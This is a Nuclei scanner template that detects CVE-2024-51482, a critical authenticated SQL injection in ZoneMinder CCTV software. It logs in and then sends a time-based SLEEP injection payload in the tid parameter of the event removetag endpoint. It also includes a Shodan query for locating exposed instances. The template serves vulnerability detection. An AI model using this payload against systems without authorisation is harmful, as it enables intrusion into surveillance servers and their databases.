id: CVE-2024-51482 info: name: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection author: ritikchaddha severity: critical description: | ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65. impact: | Attackers can exploit this vulnerability to compromise system security and integrity. remediation: | Apply the latest security patches and updates to address this vulnerability. reference: - https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/ - https://nvd.nist.gov/vuln/detail/CVE-2024-51482 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2024-51482 cwe-id: CWE-89 epss-score: 0.3661 epss-percentile: 0.98448 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: zoneminder product: zoneminder shodan-query: title:"ZoneMinder" tags: cve,cve2024,zoneminder,sqli,authenticated,vuln flow: http(1) && http(2) && http(3) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: word part: body words: - "ZoneMinder" - "ZoneMinder Login" - "ZoneMinder" condition: or internal: true - raw: - | POST /zm?view=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=login&postLoginQuery=&username={{username}}&password={{password}} - | GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "{\"result\":\"OK")' internal: true - raw: - | @timeout: 30s GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=7' - 'status_code == 200' condition: and # digest: 4b0a004830460221008625ce55efa2d535899fe0c1dec29a1b8d698e684d6bab36e29c124d7910db04022100f157e833422b68c1c570df658620a02fb9f746d5a251dd310309a1f83bf8f211:922c64590222798bb761d5b6d8e72950